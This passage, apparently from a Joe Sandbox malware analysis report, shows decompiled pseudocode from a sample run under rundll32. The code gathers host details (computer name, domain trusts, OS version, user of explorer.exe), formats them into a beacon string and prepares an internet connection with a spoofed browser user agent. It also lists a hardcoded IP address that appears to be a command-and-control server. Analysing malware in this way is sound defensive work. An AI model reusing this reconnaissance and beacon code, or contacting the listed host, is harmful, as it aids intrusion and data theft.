				 *((intOrPtr*)(_t107 + 0x14)) = _v8;
				 *((intOrPtr*)(_t107 + 0x10)) = E0281EF78;
				_t109 =  *0x2864424; // 0x2865030
				GetModuleFileNameA( *_t109,  &_v276, 0x100); // executed
				OemToCharA( &_v276,  &_v276);
				_v20 = E027DC9DC(0x5c);
				if(_v20 != 0) {
					E027D8BC4( &_v276, _v20 + 1);
				}
				_v20 = E027DCA04( &_v276, 0x2e);
				if(_v20 != 0) {
					 *_v20 = 0;
				}
				CharLowerA( &(( &_v276)[1])); // executed
				E027D4358(_v8 + 0x8c, 0x100,  &_v276);
				_t125 =  *0x28642c0; // 0x2865038
				if( *_t125 == 0) {
					E0281D0B8(_v8, 0x100);
				}
				 *((char*)(_v8 + 0x59)) = 1;
				 *((char*)(_v8 + 0x5a)) = 1;
				 *((char*)(_v8 + 0x5b)) = 1;
				 *((char*)(_v8 + 0x9e)) = 1;
				 *((intOrPtr*)(_v8 + 0xa0)) = 0;
				E0281F1A0(_v8, 0x100);
				E0281FD14(_v8);
				_t135 = _v8;
				if(_v9 != 0) {
					E027D35C8(_t135);
					_pop( *[fs:0x0]);
				}
				return _v8;
			}
























                          0x0281cd08
                          0x0281cd08
                          0x0281cd13
                          0x0281cd15
                          0x0281cd18
                          0x0281cd18
                          0x0281cd1d
                          0x0281cd20
                          0x0281cd23
                          0x0281cd2e
                          0x0281cd33
                          0x0281cd3d
                          0x0281cd3f
                          0x0281cd47
                          0x0281cd4a
                          0x0281cd4a
                          0x0281cd50
                          0x0281cd5a
                          0x0281cd5c
                          0x0281cd64
                          0x0281cd67
                          0x0281cd67
                          0x0281cd70
                          0x0281cd83
                          0x0281cd98
                          0x0281cda3
                          0x0281cdab
                          0x0281cdb4
                          0x0281cdbe
                          0x0281cdc8
                          0x0281cdd1
                          0x0281cdda
                          0x0281cde4
                          0x0281cdee
                          0x0281cdf8
                          0x0281ce0e
                          0x0281ce19
                          0x0281ce21
                          0x0281ce31
                          0x0281ce39
                          0x0281ce42
                          0x0281ce45
                          0x0281ce58
                          0x0281ce60
                          0x0281ce73
                          0x0281ce85
                          0x0281ce8c
                          0x0281ce98
                          0x0281ce98
                          0x0281ceaa
                          0x0281ceb1
                          0x0281ceb6
                          0x0281ceb6
                          0x0281cec1
                          0x0281ced9
                          0x0281cede
                          0x0281cee6
                          0x0281ceeb
                          0x0281ceeb
                          0x0281cef3
                          0x0281cefa
                          0x0281cf01
                          0x0281cf08
                          0x0281cf14
                          0x0281cf1d
                          0x0281cf25
                          0x0281cf2a
                          0x0281cf31
                          0x0281cf33
                          0x0281cf38
                          0x0281cf3f
                          0x0281cf48

                          APIs
                          • LoadIconA.USER32(00000000,MAINICON), ref: 0281CE21
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,MAINICON), ref: 0281CE60
                          • OemToCharA.USER32(?,?), ref: 0281CE73
                          • CharLowerA.USER32(?,00000000,?,00000100,00000000,MAINICON), ref: 0281CEC1
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Char$FileIconLoadLowerModuleName
                          • String ID: MAINICON
                          • API String ID: 3935243913-2283262055
                          • Opcode ID: 1972e42e3a2752210df03c85c87f0a2d0f99a43b540fa414abdc102038032813
                          • Instruction ID: 707ead5e8c26d2166e63cbd06d5586874ce315f185ce6d70eb011121acecc9bb
                          • Opcode Fuzzy Hash: 1972e42e3a2752210df03c85c87f0a2d0f99a43b540fa414abdc102038032813
                          • Instruction Fuzzy Hash: 14713578A00248DFDB05DFA8C589B9DBBF6AF09304F1484E5D808AB3A2C771AE44DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D1AA0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 95%
                          			E042D1AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v324;
				char _v2372;
				char _v6468;
				intOrPtr _t47;
				intOrPtr _t56;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				char* _t72;
				void* _t75;
				char* _t89;
				intOrPtr _t95;
				char* _t104;
				intOrPtr _t106;
				void* _t110;
				void* _t113;
				void* _t114;

				_t95 = __edx;
				E042D1420(0x1940);
				_v12 = GetVersion();
				_t47 = E042D2630(_t95); // executed
				_v32 = _t47;
				_v28 = _t95;
				E042D30F0( &_v324); // executed
				E042D2520( &_v68,  &_v68); // executed
				E042D23C0( &_v2372); // executed
				_t113 = _t110 + 0xc;
				_v20 = _v12 & 0xff;
				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
				_t56 = E042D3400(); // executed
				_v36 = _t56;
				if(_v36 != 1) {
					_push(_v16);
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E042D25B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				} else {
					_push(_v16);
					_t75 = E042D25B0( &_v324); // executed
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				}
				if( *0x42d72a0 == 0) {
					_t71 = E042D1390(0x400);
					_t114 = _t114 + 4;
					 *0x42d72a0 = _t71;
					_t72 =  *0x42d72a0; // 0x2960a78
					 *_t72 = 0;
				}
				_v24 = 1;
				while(_v24 == 1) {
					_t63 =  *0x42d72a0; // 0x2960a78
					_t87 =  *_t63;
					if( *_t63 == 0) {
						_t106 =  *0x42d72a0; // 0x2960a78
						_t70 = E042D2660(_t87, _t106);
						_t114 = _t114 + 4;
						_v24 = _t70;
					}
					_t89 =  *0x42d72a0; // 0x2960a78
					_t66 = E042D28D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
					_t114 = _t114 + 0x14;
					_v8 = _t66;
					if(_v8 == 1) {
						_t69 = E042D1A00(_t89, _a4);
						_t114 = _t114 + 4;
						_v8 = _t69;
					}
					if(_v8 != 1) {
						_t104 =  *0x42d72a0; // 0x2960a78
						 *_t104 = 0;
						continue;
					} else {
						return 1;
					}
				}
				return 0;
			}































                          0x042d1aa0
                          0x042d1aa8
                          0x042d1ab3
                          0x042d1ab6
                          0x042d1abb
                          0x042d1abe
                          0x042d1ac8
                          0x042d1ad4
                          0x042d1ae3
                          0x042d1ae8
                          0x042d1aff
                          0x042d1b19
                          0x042d1b1c
                          0x042d1b21
                          0x042d1b28
                          0x042d1b6c
                          0x042d1b9d
                          0x042d1ba3
                          0x042d1b2a
                          0x042d1b2d
                          0x042d1b44
                          0x042d1b5e
                          0x042d1b64
                          0x042d1b64
                          0x042d1bad
                          0x042d1bb4
                          0x042d1bb9
                          0x042d1bbc
                          0x042d1bc9
                          0x042d1bce
                          0x042d1bce
                          0x042d1bd2
                          0x042d1bd9
                          0x042d1beb
                          0x042d1bf0
                          0x042d1bf6
                          0x042d1bf8
                          0x042d1bff
                          0x042d1c04
                          0x042d1c07
                          0x042d1c07
                          0x042d1c1d
                          0x042d1c24
                          0x042d1c29
                          0x042d1c2c
                          0x042d1c33
                          0x042d1c39
                          0x042d1c3e
                          0x042d1c41
                          0x042d1c41
                          0x042d1c48
                          0x042d1c59
                          0x042d1c5f
                          0x00000000
                          0x042d1c4a
                          0x00000000
                          0x042d1c4a
                          0x042d1c48
                          0x00000000

                          APIs
                          • GetVersion.KERNEL32(?,042D18CD,?,00100000,?), ref: 042D1AAD
                            • Part of subcall function 042D30F0: GetComputerNameA.KERNEL32(?,00000104), ref: 042D311A
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000,?), ref: 042D312F
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000, @ ), ref: 042D313E
                            • Part of subcall function 042D30F0: lstrcatA.KERNEL32(00100000,?), ref: 042D3162
                            • Part of subcall function 042D2520: lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D2540
                            • Part of subcall function 042D23C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,042D1AE8,?,?,042D1AE8,?,?,?), ref: 042D23E1
                            • Part of subcall function 042D3400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,042D1B21), ref: 042D341B
                          • wsprintfA.USER32 ref: 042D1B5E
                          • wsprintfA.USER32 ref: 042D1B9D
                          Strings
                          • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 042D1B91
                          • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 042D1B52
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                          • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                          • API String ID: 768865819-2171647522
                          • Opcode ID: aef253e4e2a0bbf2f8ece8bacbb7bd6afd4ff35a3b0cbe631e0a7de989b1867d
                          • Instruction ID: abb6a72bab56dc269a80ab9e11f82453b5ddf7339499b9b2d90b2bf68e6d913b
                          • Opcode Fuzzy Hash: aef253e4e2a0bbf2f8ece8bacbb7bd6afd4ff35a3b0cbe631e0a7de989b1867d
                          • Instruction Fuzzy Hash: 06516FB2E10259DFEB18DF98D854EFE77B8FF48304F04816DE60697240E638AA55CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D30F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 324 42d30f0-42d3122 GetComputerNameA 325 42d3135-42d3155 lstrcatA call 42d2df0 324->325 326 42d3124-42d312f lstrcatA 324->326 329 42d3168-42d3170 325->329 330 42d3157-42d3162 lstrcatA 325->330 326->325 330->329
                          C-Code - Quality: 100%
                          			E042D30F0(CHAR* _a4) {
				long _v8;
				char _v268;
				char _v528;
				int _t14;
				void* _t16;

				 *_a4 = 0;
				_v8 = 0x104;
				_t14 = GetComputerNameA( &_v268,  &_v8);
				_t31 = _t14;
				if(_t14 != 0) {
					lstrcatA(_a4,  &_v268);
				}
				lstrcatA(_a4, " @ ");
				_t16 = E042D2DF0(_t31,  &_v528); // executed
				if(_t16 != 0) {
					lstrcatA(_a4,  &_v528);
				}
				return 1;
			}








                          0x042d3104
                          0x042d3108
                          0x042d311a
                          0x042d3120
                          0x042d3122
                          0x042d312f
                          0x042d312f
                          0x042d313e
                          0x042d314b
                          0x042d3155
                          0x042d3162
                          0x042d3162
                          0x042d3170

                          APIs
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 042D311A
                          • lstrcatA.KERNEL32(00100000,?), ref: 042D312F
                          • lstrcatA.KERNEL32(00100000, @ ), ref: 042D313E
                          • lstrcatA.KERNEL32(00100000,?), ref: 042D3162
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$ComputerName
                          • String ID: @
                          • API String ID: 2583549208-203157567
                          • Opcode ID: 5c00926960206df227cd930782082c1d82a0025b76069921023ffdfd8b9790ef
                          • Instruction ID: 757a8ad24220647803832f6b96876a623447a539cd28e0708d695b9d29b0e86b
                          • Opcode Fuzzy Hash: 5c00926960206df227cd930782082c1d82a0025b76069921023ffdfd8b9790ef
                          • Instruction Fuzzy Hash: D60186B5B01349ABDB14EFA8D848BDA777CEB48301F004198F949D7241DB79EA84CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D23C0 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 331 42d23c0-42d23e9 DsEnumerateDomainTrustsA 332 42d23eb-42d23ed 331->332 333 42d23f2-42d23f6 331->333 334 42d2487-42d248a 332->334 335 42d23f8-42d23fd 333->335 336 42d2402-42d2409 333->336 335->334 337 42d2414-42d241a 336->337 338 42d241c-42d2427 337->338 339 42d2482 337->339 340 42d244d-42d2459 338->340 341 42d2429-42d2447 lstrcatA * 2 338->341 339->334 342 42d245b-42d247a lstrcatA * 2 340->342 343 42d2480 340->343 341->340 342->343 343->337
                          C-Code - Quality: 75%
                          			E042D23C0(CHAR* _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char* _t30;

				 *_a4 = 0;
				_t30 =  &_v16;
				__imp__DsEnumerateDomainTrustsA(0, 0x3f,  &_v12, _t30); // executed
				if(_t30 == 0) {
					if(_v16 != 0) {
						_v8 = 0;
						while(_v8 < _v16) {
							if( *(_v12 + _v8 * 0x2c) != 0) {
								lstrcatA(_a4,  *(_v12 + _v8 * 0x2c));
								lstrcatA(_a4, ";");
							}
							if( *((intOrPtr*)(_v12 + 4 + _v8 * 0x2c)) != 0) {
								_t26 = 4 + _v8 * 0x2c; // 0xff25f845
								lstrcatA(_a4,  *(_v12 + _t26));
								lstrcatA(_a4, ";");
							}
							_v8 = _v8 + 1;
						}
						return 1;
					}
					return 1;
				}
				return 0;
			}







                          0x042d23d1
                          0x042d23d5
                          0x042d23e1
                          0x042d23e9
                          0x042d23f6
                          0x042d2402
                          0x042d2414
                          0x042d2427
                          0x042d2438
                          0x042d2447
                          0x042d2447
                          0x042d2459
                          0x042d2462
                          0x042d246b
                          0x042d247a
                          0x042d247a
                          0x042d2411
                          0x042d2411
                          0x00000000
                          0x042d2482
                          0x00000000
                          0x042d23f8
                          0x00000000

                          APIs
                          • DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,042D1AE8,?,?,042D1AE8,?,?,?), ref: 042D23E1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DomainEnumerateTrusts
                          • String ID:
                          • API String ID: 4051863571-0
                          • Opcode ID: bf7abdec21d3c3aa5a667e1ea5ecaebc64e18272fd1d651cf4a554e0f1d8a127
                          • Instruction ID: abecbe79fc7ab9cd4df432f4c78f94912a686f9d5ee09011c4347916abdaf7e2
                          • Opcode Fuzzy Hash: bf7abdec21d3c3aa5a667e1ea5ecaebc64e18272fd1d651cf4a554e0f1d8a127
                          • Instruction Fuzzy Hash: F1214F31B21209EBCB08DF98D988FADBB79EB44301F108198E5059B291D774EA81DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D2DF0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v276;
				char _v536;
				long _t16;
				void* _t20;

				_t16 = E042D2E90("explorer.exe"); // executed
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				_t20 = E042D3000(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}










                          0x042d2dfe
                          0x042d2e06
                          0x042d2e09
                          0x042d2e10
                          0x042d2e22
                          0x042d2e40
                          0x042d2e4a
                          0x00000000
                          0x042d2e84
                          0x042d2e57
                          0x042d2e66
                          0x042d2e77
                          0x00000000

                          APIs
                            • Part of subcall function 042D2E90: K32EnumProcesses.KERNEL32(?,00001000,042D2E03,?,042D2E03,explorer.exe), ref: 042D2EAD
                            • Part of subcall function 042D3000: OpenProcess.KERNEL32(00000400,00000000,?,?,042D2E45,?,?,00000104,?,00000104), ref: 042D3011
                          • lstrcpyA.KERNEL32(00000104,?), ref: 042D2E57
                          • lstrcatA.KERNEL32(00000104,042D42B8), ref: 042D2E66
                          • lstrcatA.KERNEL32(00000104,?), ref: 042D2E77
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                          • String ID: explorer.exe
                          • API String ID: 1774016706-3187896405
                          • Opcode ID: c3864c181622bf66285e720043fca6c7c4994e7e8f544e424f4ed609b8e093d5
                          • Instruction ID: d9d824c2ed09829afb640811ff686313d8b19c82581c52fad9cc55b2e6b3741f
                          • Opcode Fuzzy Hash: c3864c181622bf66285e720043fca6c7c4994e7e8f544e424f4ed609b8e093d5
                          • Instruction Fuzzy Hash: B41148B5F10209ABDB14EFA8DD49BDE77B8EB48300F004194F609D7241E674EA44CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281B694 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E0281B694(intOrPtr __ecx, char __edx, void* __edi) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct HDC__* _v20;
				void* __ebp;
				intOrPtr _t55;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t81;
				intOrPtr _t93;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t101;
				char _t103;
				void* _t128;
				void* _t129;
				void* _t130;

				_t128 = __edi;
				_t103 = __edx;
				_t101 = __ecx;
				if(__edx != 0) {
					_t130 = _t130 + 0xfffffff0;
					_t55 = E027D3570(_t55, _t129);
				}
				_v16 = _t101;
				_v9 = _t103;
				_v8 = _t55;
				E027F3854(_v16, 0);
				_t58 =  *0x28643a8; // 0x2863584
				 *((intOrPtr*)(_t58 + 4)) = _v8;
				 *_t58 = E0281BC04;
				_t59 =  *0x28643b8; // 0x286358c
				 *((intOrPtr*)(_t59 + 4)) = _v8;
				 *_t59 = E0281BC24;
				E0281BC44(_v8); // executed
				 *((intOrPtr*)(_v8 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_v8 + 0x4c)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0x50)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0x54)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0x58)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0x7c)) = E027D31DC(1);
				_v20 = GetDC(0);
				 *((intOrPtr*)(_v8 + 0x40)) = GetDeviceCaps(_v20, 0x5a);
				ReleaseDC(0, _v20);
				_t81 =  *0x286453c; // 0x28658ac
				 *((intOrPtr*)( *_t81))(0, 0, E02817054,  *((intOrPtr*)(_v8 + 0x58)));
				 *((intOrPtr*)(_v8 + 0x84)) = E027F7304(1);
				 *((intOrPtr*)(_v8 + 0x88)) = E027F7304(1);
				 *((intOrPtr*)(_v8 + 0x80)) = E027F7304(1);
				E0281C1EC(_v8, _t128); // executed
				_t93 =  *((intOrPtr*)(_v8 + 0x84));
				 *((intOrPtr*)(_t93 + 0xc)) = _v8;
				 *((intOrPtr*)(_t93 + 8)) = E0281C038;
				_t95 =  *((intOrPtr*)(_v8 + 0x88));
				 *((intOrPtr*)(_t95 + 0xc)) = _v8;
				 *((intOrPtr*)(_t95 + 8)) = E0281C038;
				_t97 =  *((intOrPtr*)(_v8 + 0x80));
				 *((intOrPtr*)(_t97 + 0xc)) = _v8;
				 *((intOrPtr*)(_t97 + 8)) = E0281C038;
				_t98 = _v8;
				if(_v9 != 0) {
					E027D35C8(_t98);
					_pop( *[fs:0x0]);
				}
				return _v8;
			}





















                          0x0281b694
                          0x0281b694
                          0x0281b694
                          0x0281b69c
                          0x0281b69e
                          0x0281b6a1
                          0x0281b6a1
                          0x0281b6a6
                          0x0281b6a9
                          0x0281b6ac
                          0x0281b6b7
                          0x0281b6bc
                          0x0281b6c4
                          0x0281b6c7
                          0x0281b6cd
                          0x0281b6d5
                          0x0281b6d8
                          0x0281b6e1
                          0x0281b6f0
                          0x0281b702
                          0x0281b714
                          0x0281b726
                          0x0281b738
                          0x0281b74a
                          0x0281b754
                          0x0281b765
                          0x0281b76e
                          0x0281b784
                          0x0281b78b
                          0x0281b79c
                          0x0281b7b1
                          0x0281b7c6
                          0x0281b7cf
                          0x0281b7d7
                          0x0281b7e0
                          0x0281b7e3
                          0x0281b7ed
                          0x0281b7f6
                          0x0281b7f9
                          0x0281b803
                          0x0281b80c
                          0x0281b80f
                          0x0281b816
                          0x0281b81d
                          0x0281b81f
                          0x0281b824
                          0x0281b82b
                          0x0281b834

                          APIs
                          • GetKeyboardLayout.USER32(00000000), ref: 0281B6E8
                          • GetDC.USER32(00000000), ref: 0281B74F
                          • GetDeviceCaps.GDI32(?,0000005A), ref: 0281B75D
                          • ReleaseDC.USER32(00000000,?), ref: 0281B76E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDeviceKeyboardLayoutRelease
                          • String ID:
                          • API String ID: 3331096196-0
                          • Opcode ID: 6832fa18dd0a45eb187f7463bf580ea6f11c9ce9534c0253ebb0fa962d8d6a8c
                          • Instruction ID: 7998952bb4ec15ee7bfb3ba654e59f4ae11de09d82f8cba1343dcbfb3215712a
                          • Opcode Fuzzy Hash: 6832fa18dd0a45eb187f7463bf580ea6f11c9ce9534c0253ebb0fa962d8d6a8c
                          • Instruction Fuzzy Hash: 75510278A40249EFCB44DF98DA88A9DB7F6BF48304F2481E5D9089B361D731AE45DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2F30 Relevance: 6.1, APIs: 4, Instructions: 58stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E042D2F30(long _a4, CHAR* _a8) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				_t29 = OpenProcess(0x400, 0, _a4);
				_v12 = _t29;
				if(_v12 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v12); // executed
				L042D3BE3(); // executed
				_v20 = _t29;
				FindCloseChangeNotification(_v12); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v16 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				if(_v16 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v16);
				return 1;
			}










                          0x042d2f44
                          0x042d2f4a
                          0x042d2f51
                          0x042d2feb
                          0x00000000
                          0x042d2feb
                          0x042d2f57
                          0x042d2f62
                          0x042d2f66
                          0x042d2f67
                          0x042d2f6c
                          0x042d2f73
                          0x042d2f7d
                          0x00000000
                          0x00000000
                          0x042d2f7f
                          0x042d2f86
                          0x042d2f98
                          0x042d2fae
                          0x042d2fba
                          0x042d2fba
                          0x042d2fca
                          0x042d2f95
                          0x00000000
                          0x042d2fcc
                          0x00000000
                          0x042d2fcc
                          0x042d2fca
                          0x042d2fd4
                          0x00000000
                          0x00000000
                          0x042d2fde
                          0x00000000

                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,042D2E03), ref: 042D2F44
                          • K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 042D2F67
                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000104), ref: 042D2F73
                          • lstrcpyA.KERNEL32(00000000,00000000), ref: 042D2FDE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
                          • String ID:
                          • API String ID: 1999166229-0
                          • Opcode ID: f02c557c0a5a9a384e4f0fa4b576357284d83adc626bb705a7f88d31098bc31d
                          • Instruction ID: db975b2e94a310c57c9012f3f8c8b229c228c4477df51168b12c2c6ba2b608db
                          • Opcode Fuzzy Hash: f02c557c0a5a9a384e4f0fa4b576357284d83adc626bb705a7f88d31098bc31d
                          • Instruction Fuzzy Hash: FA213870F1420CEFCB18DF98D984BEDB7B5FB44305F108999E519A7280D3B46A84DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D24F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D24F0() {
				void* _t1;
				void* _t2;

				if( *0x42d7270 == 0) {
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					 *0x42d7270 = _t2;
				}
				_t1 =  *0x42d7270; // 0xcc0004
				return _t1;
			}





                          0x042d24fa
                          0x042d2509
                          0x042d250f
                          0x042d250f
                          0x042d2514
                          0x042d251a

                          APIs
                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 042D2509
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 042D2504
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetOpen
                          • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          • API String ID: 2038078732-3333256863
                          • Opcode ID: 5300d3ee22748798f6fe29fe7a84bc0b4ac06f38ae7f348cb932e52306a9156d
                          • Instruction ID: 443c4d46f23a9f22ac8f7b55ee9c08cd899ce08f3e67e1bec486b581cc0f176b
                          • Opcode Fuzzy Hash: 5300d3ee22748798f6fe29fe7a84bc0b4ac06f38ae7f348cb932e52306a9156d
                          • Instruction Fuzzy Hash: 9FD0C930B92744ABEB349E6CBD0EF1033A4F384B15F900011B208661C1CBBC78598A59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028D6D70 Relevance: 3.2, APIs: 2, Instructions: 195memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 028D6DBB
                          • VirtualProtect.KERNEL32(?,?,00000000), ref: 028D6F62
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProtect
                          • String ID:
                          • API String ID: 2447062925-0
                          • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                          • Instruction ID: 1aea23dd1798c91792655a3c73cf68a861c86439dda07cf433aeddffb75de7a7
                          • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
